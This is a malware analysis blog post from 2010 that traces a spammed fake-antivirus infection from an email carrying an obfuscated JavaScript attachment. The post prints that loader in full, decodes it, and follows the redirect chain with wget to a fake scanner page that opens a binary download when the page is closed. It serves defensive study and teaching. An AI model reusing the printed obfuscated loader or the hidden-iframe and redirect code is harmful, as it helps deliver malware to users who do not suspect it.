03.11.2010 13:01

Yet another current fake AV infection

Tiny report of yet another current fake AV infection which is being spammed out via Email.

Warning: do not try to reproduce these results on a Windows PC unless you know what you are doing. As of the time of this writing, the URLs mentioned in this report are live and contain malware.

Background

Today the following Email (with attached Javascript file) caught my attention:
From:     Andres Pratt <asiaticshqz83@royalhighgate.com>
 Subject:     Vacation Care Payment Program - September 2010
 Date:     September 20, 2010 3:55:08 PM GMT+02:00
 To:     mymailinglist-owner@lists.YYYYYY.org
 Return-Path:     <mailman-bounces@lists.YYYYYY.org>
 X-Original-To:     aaron@XXXXXX.org
 Delivered-To:     aaron@XXXXXX.org
 X-Policyd-Weight:     using cached result; rate:hard: -7.6
 Received:     from abc.YYYYYY.org (abc.YYYYYY.org [1.2.3.4]) by mailserver.XXXXXX.org (Postfix)
    with ESMTP id 919B6CE21B0 for <aaron@XXXXXX.org>; Mon, 20 Sep 2010 14:55:19 +0200 (CEST)
 Received:     from localhost ([127.0.0.1] helo=abc.YYYYYY.org) by abc.YYYYYY.org with esmtp
   (Exim 4.63) (envelope-from <mailman-bounces@lists.YYYYYY.org>) id 1Oxftv-000581-5y; Mon,
    20 Sep 2010 14:55:19 +0200
 Received:     from [109.228.248.243] (helo=LOSHAZXPVC) by abc.YYYYYY.org with esmtp
   (Exim 4.63) (envelope-from <asiaticshqz83@royalhighgate.com>) id 1Oxftq-00057e-Ki; Mon,
   20 Sep 2010 14:55:17 +0200
 Received:     from mta003.royalhighgate.com (mta298.royalhighgate.com [66.231.92.249]) by
   mail.royalhighgate.com (8.13.2+Sun/8.13.9) with ESMTP id 36ij9391558267 for
   <mymailinglist-owner@lists.YYYYYY.org>; Mon, 20 Sep 2010 15:55:08 +0200
 Message-Id:     <41060351.52314783258024343.JavaMail.pc1@nielu8.royalhighgate.com>
 Mime-Version:     1.0
 Content-Type:     multipart/mixed; boundary="----=_Part_8807_43917428.1091380632604"
 X-Spam-Checker-Version:     SpamAssassin 3.1.7-deb3 (2006-10-05) on  abc.YYYYYY.org
 X-Spam-Level:     **
 X-Spam-Status:     No, score=2.9 required=5.0 tests=BAYES_50,HTML_MESSAGE,
   RCVD_IN_BSP_OTHER,RCVD_IN_PBL,RCVD_IN_SORBS_WEB autolearn=no  version=3.1.7-deb3
 Sender:     mailman-bounces@lists.YYYYYY.org
 Errors-To:     mailman-bounces@lists.YYYYYY.org
 X-Sa-Exim-Connect-Ip:     127.0.0.1
 X-Sa-Exim-Mail-From:     mailman-bounces@lists.YYYYYY.org
 X-Sa-Exim-Scanned:     No (on abc.YYYYYY.org); SAEximRunCond expanded to false
HI All,

Attached is the program and payments program for the upcoming vacation care. As I will be absent over this time I trying to ensure all is well organized for the team. Could you please confirm how you wish to pay for the events as listed.
[Attached Javascript]
As I was curious, I simply looked at the Javascript to determine what new variant of maliciousness the spammers had come up with today. For the sake of documentation, I further decided to write down the results of this mini-analysis in the hope that others can learn from it.

Let's first concentrate on the mail itself: if you look at the IP addresses above, the mail went from 66.231.92.249 to 109.228.248.243 and then to a mailing list (mailman) at YYYYYY.org (which refused it and generated a bounce to me since my email address is in the "mailman-bounces" alias). So far we can only determine that the mail went from 66.231.92.249 (Exact Target Inc. in Indianapolis) to MILLENICOM-DSLNET2 (a DSL range in Turkey, probably an infected PC). So far so good, but we don't get much information from this.
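To make the reading of the Received: chain above reproducible, here is a small Node.js helper (added for this write-up, not part of the original mail analysis) that unfolds the headers and lists the hops oldest first. The sample headers are constructed from the ones shown above, with the same XXXXXX/YYYYYY placeholders.

```javascript
// Constructed sample: the Received: headers of the bounced mail above,
// newest on top, folded across lines exactly as they arrived.
const RAW_HEADERS = [
  "Received: from abc.YYYYYY.org (abc.YYYYYY.org [1.2.3.4]) by mailserver.XXXXXX.org (Postfix)",
  "    with ESMTP id 919B6CE21B0 for <aaron@XXXXXX.org>; Mon, 20 Sep 2010 14:55:19 +0200 (CEST)",
  "Received: from localhost ([127.0.0.1] helo=abc.YYYYYY.org) by abc.YYYYYY.org with esmtp",
  "   (Exim 4.63) (envelope-from <mailman-bounces@lists.YYYYYY.org>) id 1Oxftv-000581-5y; Mon,",
  "    20 Sep 2010 14:55:19 +0200",
  "Received: from [109.228.248.243] (helo=LOSHAZXPVC) by abc.YYYYYY.org with esmtp",
  "   (Exim 4.63) (envelope-from <asiaticshqz83@royalhighgate.com>) id 1Oxftq-00057e-Ki; Mon,",
  "   20 Sep 2010 14:55:17 +0200",
  "Received: from mta003.royalhighgate.com (mta298.royalhighgate.com [66.231.92.249]) by",
  "   mail.royalhighgate.com (8.13.2+Sun/8.13.9) with ESMTP id 36ij9391558267 for",
  "   <mymailinglist-owner@lists.YYYYYY.org>; Mon, 20 Sep 2010 15:55:08 +0200",
].join("\n");

// Unfold RFC 5322 continuation lines (leading whitespace) and return the
// values of the Received: headers only, in header order (newest first).
function receivedHeaders(raw) {
  const unfolded = raw.replace(/\r?\n[ \t]+/g, " ");
  return unfolded.split(/\r?\n/)
    .filter((l) => /^Received:/i.test(l))
    .map((l) => l.replace(/^Received:\s*/i, ""));
}

// Pull the "from" name, the bracketed IP, the "by" host and the timestamp
// (everything after the first ";") out of one Received: value.
function parseHop(value) {
  const from = /^from\s+(\S+)/i.exec(value);
  const by = /\bby\s+(\S+)/i.exec(value);
  const ip = /\[(\d{1,3}(?:\.\d{1,3}){3})\]/.exec(value);
  const date = /;\s*(.+)$/.exec(value);
  return {
    from: from ? from[1] : null,
    ip: ip ? ip[1] : null,
    by: by ? by[1] : null,
    date: date ? date[1].trim() : null,
  };
}

// Oldest hop first, i.e. the order in which the message actually travelled.
function deliveryPath(raw) {
  return receivedHeaders(raw).map(parseHop).reverse();
}

deliveryPath(RAW_HEADERS).forEach((h, i) =>
  console.log(`hop ${i + 1}: ${h.from} [${h.ip}] -> ${h.by} at ${h.date}`));
```

Note that each hop is only as trustworthy as the server that added it; the bottom-most (oldest) line is written by whoever handed the mail in and can be forged, which is exactly why the chain should be read from the trusted receiving server downwards.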

But more interesting than the mail is the actual attached Javascript. Let's take a look at it:

<script language="JavaScript" type="text/javascript">function uvru(xdkz){var
 trzu=" oq0-fbinrxehc:v>.=\"/pa;gtusml<",t998,k5qe,t7ah="",dhyp,bbwn=trzu.length;
eval(unescape("%66un%63ti%6Fn l%75bx%28vk%76v){%747a%68+=%76kvv%7D"));
for(dhyp=0;dhyp<xdkz.length;dhyp++){t998=xdkz.charAt(dhyp);k5qe=trzu.indexOf(t998);
if(k5qe>-1){k5qe-=(dhyp+1)%bbwn;if(k5qe<0){k5qe+=bbwn;}lubx(trzu.charAt(k5qe));
}else{lubx(t998);}}eval(t7ah); eval(unescape("%64oc%75me%6Et.w%72it%65(t%37ah)%3Bt7%61h=%22%22;"));
}uvru(" <:lsb\"q0 v;vra -bm u 0/b:sx<ithxmagr<0=nlginf<bisps/0=0bi:<ngph/><0fsr<s");
</script><noscript>To display this page you need a browser that supports JavaScript.</noscript>
Of course, the malware authors expect that the unsuspecting user will click on the mail attachment, so that this piece of HTML/JavaScript is executed from within a browser. At first sight this Javascript is short but totally unreadable. So how do we unobfuscate this Javascript without triggering any malicious side effects? It turns out that simply replacing "eval" by "alert" produces the proper results when you execute the JavaScript in the browser:
<script language="JavaScript" type="text/javascript">function uvru(xdkz){var
 trzu=" oq0-fbinrxehc:v>.=\"/pa;gtusml<",t998,k5qe,t7ah="",dhyp,bbwn=trzu.length;
eval(unescape("%66un%63ti%6Fn l%75bx%28vk%76v){%747a%68+=%76kvv%7D"));
for(dhyp=0;dhyp<xdkz.length;dhyp++){t998=xdkz.charAt(dhyp);k5qe=trzu.indexOf(t998);
if(k5qe>-1){k5qe-=(dhyp+1)%bbwn;if(k5qe<0){k5qe+=bbwn;}lubx(trzu.charAt(k5qe));
}else{lubx(t998);}}alert(t7ah);alert(unescape("%64oc%75me%6Et.w%72it%65(t%37ah)%3Bt7%61h=%22%22;"));
}uvru(" <:lsb\"q0 v;vra -bm u 0/b:sx<ithxmagr<0=nlginf<bisps/0=0bi:<ngph/><0fsr<s");
</script><noscript>To display this page you need a browser that supports JavaScript.</noscript>
Please observe that the first eval() was left intact: it only "decodes" and defines a helper function which is called later. But how does this trick with alert() actually work? eval() takes a string and executes it as code; alert() takes the very same string and merely displays it. So wherever the script would have run the decoded code, we instead get an alert box showing that code, without it ever being executed.

The result of the alert() function is:

Pic1: document.write(t7ah);t7ah="";

So we now know that the variable t7ah would be written to the web browser (the DOM tree). The next question is, what is the value of the t7ah variable? Again, the same trick works: the second alert() shows it.

Another alert(t7ah); shows its contents:

Pic2: the contents of the t7ah Variable

So, we effectively cracked the Javascript obfuscation! Therefore, we now know that the Javascript tells the browser to go to http://nobletree.org/x.html via an HTTP refresh.
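The same result can be obtained completely statically, without a browser and without any eval(). The following Node.js script is an added example for this write-up (not part of the original attachment): it re-implements the substitution step of uvru() and decodes the two unescape()d strings, returning everything as plain strings instead of running them.

```javascript
// Stand-in for the legacy unescape(): decodes %XX and %uXXXX sequences,
// which is all the two eval(unescape(...)) calls in the sample rely on.
function decodeEscapes(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (m, u4, x2) =>
    String.fromCharCode(parseInt(u4 || x2, 16)));
}

// The substitution step of uvru(): every input character found in the
// alphabet is replaced by the alphabet character (position+1) mod length
// places to its left (wrapping around); other characters pass through.
// The output is returned, never handed to eval() or document.write().
function decodeSubstitution(alphabet, input) {
  const n = alphabet.length;
  let out = "";
  for (let i = 0; i < input.length; i++) {
    const ch = input.charAt(i);
    let k = alphabet.indexOf(ch);
    if (k > -1) {
      k -= (i + 1) % n;
      if (k < 0) k += n;
      out += alphabet.charAt(k);
    } else {
      out += ch;
    }
  }
  return out;
}

// Constants copied verbatim from the obfuscated attachment above.
const ALPHABET = " oq0-fbinrxehc:v>.=\"/pa;gtusml<";
const PAYLOAD = " <:lsb\"q0 v;vra -bm u 0/b:sx<ithxmagr<0=nlginf<bisps/0=0bi:<ngph/><0fsr<s";
const EVAL1 = "%66un%63ti%6Fn l%75bx%28vk%76v){%747a%68+=%76kvv%7D";
const EVAL2 = "%64oc%75me%6Et.w%72it%65(t%37ah)%3Bt7%61h=%22%22;";

// Returns the three pieces the script hides: the helper the first eval()
// defines, the sink the second eval() runs, and the decoded t7ah markup.
function decodeSample() {
  return {
    helper: decodeEscapes(EVAL1),
    sink: decodeEscapes(EVAL2),
    html: decodeSubstitution(ALPHABET, PAYLOAD),
  };
}

const result = decodeSample();
console.log(result.helper);
console.log(result.sink);
console.log(result.html);
```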

Ok, so let's go to http://nobletree.org/x.html ourselves (manually):

$ wget http://nobletree.org/x.html
The Unix tool wget has the advantage that no unexpected Javascript will be executed. It simply fetches the file.

Here is the content of the x.html file:

PLEASE WAITING.... 4 SECONDS
 <meta http-equiv="refresh" content="4;url=http://scaner-high.cz.cc/scanner10/?afid=24" />
 <iframe width="0" height="0" src="http://finwizonline.com/news/"></iframe>
Obviously the attackers will redirect us again to two new URLs. So we can now take a look at these two domains:
$ host scaner-high.cz.cc
 scaner-high.cz.cc has address 91.211.119.162
$ whois 91.211.119.162
 #
 % Information related to '91.211.116.0 - 91.211.119.255'
inetnum:        91.211.116.0 - 91.211.119.255
 netname:        net-0x2a
 descr:          Zharkov Mukola Mukolayovuch
 remarks:        Datacentre "0x2a"
 country:        UA
 org:            ORG-PEZM1-RIPE
 admin-c:        ZN210-RIPE
 tech-c:         ZN210-RIPE
 status:         ASSIGNED PI
 mnt-by:         RIPE-NCC-HM-PI-MNT
 mnt-lower:      RIPE-NCC-HM-PI-MNT
 mnt-by:         ONIK-MNT
 mnt-routes:     ONIK-MNT
 mnt-domains:    ONIK-MNT
 source:         RIPE # Filtered
organisation:   ORG-PEZM1-RIPE
 org-name:       Private Entreprise Zharkov Mukola Mukolayovuch
 org-type:       OTHER
 address:        Ukraine, Kyiv, Entuziastov str. 29, of. 42
 e-mail:         support@0x2a.com.ua
 admin-c:        ZN210-RIPE
 phone:          +38-044 587-83-16
 mnt-ref:        ONIK-MNT
 mnt-by:         ONIK-MNT
 source:         RIPE # Filtered
person:         Zharkov Nikolay
 address:        Ukraine, Kyiv, Entuziastov str. 29, of. 42
 phone:          +38-044 587-83-16
 nic-hdl:        ZN210-RIPE
 mnt-by:         ONIK-MNT
 source:         RIPE # Filtered
% Information related to '91.211.116.0/22AS48587'
Looks suspicious!

But for the sake of completeness, let's also first get the iframe from above:

$ host finwizonline.com
 finwizonline.com has address 24.2.14.131     (comcast)
 finwizonline.com has address 174.58.192.19   (comcast)
 finwizonline.com has address 76.205.64.19    (AT&T PPP Pool)
 finwizonline.com has address 71.192.136.228  (comcast Boston)
 finwizonline.com has address 68.34.109.188   (comcast)
The author could not get any data from the finwizonline.com/news iframe regardless of which useragent string (IE 6.0 for example) was chosen. Possibly the website was taken down already.

So let us go back to the scaner-high.cz.cc URL:

$ wget -U "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)" \
  "http://scaner-high.cz.cc/scanner10/?afid=24"
This shows us a nice fake Antivirus screen!
$ more index.html\?afid\=24
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 <meta http-equiv="Content-Language" content="en" />
 <meta http-equiv="Cache-control" content="Public" />
<title>My Windows Online Scanner</title>
 <link rel="icon" href="/Images/favicon.gif" type="image/gif" />
<style type="text/css" media="screen">
 #loading {
 height:auto;
 left:45%;
 padding:2px;
 position:absolute;
 top:40%;
 z-index:20001;
 }
 #loading a {
 color:#225588;
 }
 #loading .loading-indicator {
 -x-system-font:none;
 background:white none repeat scroll 0 0;
 color:#444444;
 font-family:tahoma,arial,helvetica;
 font-size:13px;
 font-size-adjust:none;
 font-stretch:normal;
 font-style:normal;
 font-variant:normal;
 font-weight:bold;
 height:auto;
 line-height:normal;
 margin:0;
 padding:10px;
 }
 #loading-msg {
 -x-system-font:none;
 font-family:arial,tahoma,sans-serif;
 font-size:10px;
 font-size-adjust:none;
 font-stretch:normal;
 font-style:normal;
 font-variant:normal;
 font-weight:normal;
 line-height:normal;
 }
 </style>
 <script type="text/javascript">
 <!--//<![CDATA[
 var LinkSoftDown = "/go/?afid=24&time=1284989690";
 function ext(){window.open( "/go/?afid=24&time=1284989690", "_blank",
  "toolbar=0,titlebar=0,scrollbars=0,status=0,location=0,menubar=0,width=100,
   height=100,left=0,top=0");}
 if (window.attachEvent) eval("window.attachEvent('onunload',ext);");
 else window.addEventListener("unload", ext, false);
 //]]>-->
 </script>
 </head>
 <body>
 <div id="loading" style="display:block">
 <div class="loading-indicator">
 <img height="50" width="50" style="margin-right: 8px; float: left;
  vertical-align: top;" src="/Images/loading.gif"/>
 <br/>
 <span id="loading-msg">Initializing Virus Protection System...</span></div>
 </div>
 <script type="text/javascript" src="/scanner10/codejs">
 </script>
 </body>
 </html>
And of course - in a very efficient manner - as soon as you download and follow the http://scaner-high.cz.cc/go/?afid=24&time=1284989690 URL, a binary .EXE file will try to run on your PC! Next I wanted to see if Virustotal.com or other AV engines already know the binary.
http://www.virustotal.com/file-scan/report.html?id=de7262bf81a9d791d80986f785c795edf02ac0ba7c39cd89fb9021f8a6228e5f-1284989236
The report shows that this is a rather well known piece of malware. It is well detected: 65% of all AV engines detect this fake AV at the time of this writing.

The next step of course would be to reverse engineer this malware but - I leave it as it is right now. Nothing really new.

So far the author only managed to download the binary .EXE file if the user agent string matches as shown above.

The Webserver serving the malware runs on nginx/0.7.65. As said above, we had to fake the User Agent string to "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)". A very practical tool to fake UA strings is "UserAgent Switcher" for Firefox. This way the author could download the samples from a regular Linux PC.

Fake AV User Experience

Pic 3: a pop-up box appears and warns the user that his computer is "infected". Please note that this screenshot was of course taken on a Linux system so as not to infect the host.

If the user clicks OK here, then he is redirected to this page, which looks like a Windows window alerting him of malware:

Pic 4: a web page looking like a regular Windows window. Non-computer-savvy people would fall for this trick.

Finally if the user clicks on "remove all" he will receive a .EXE file called "antivirus.exe" which is the very same binary that we were able to download via wget before.

Author: L. Aaron Kaplan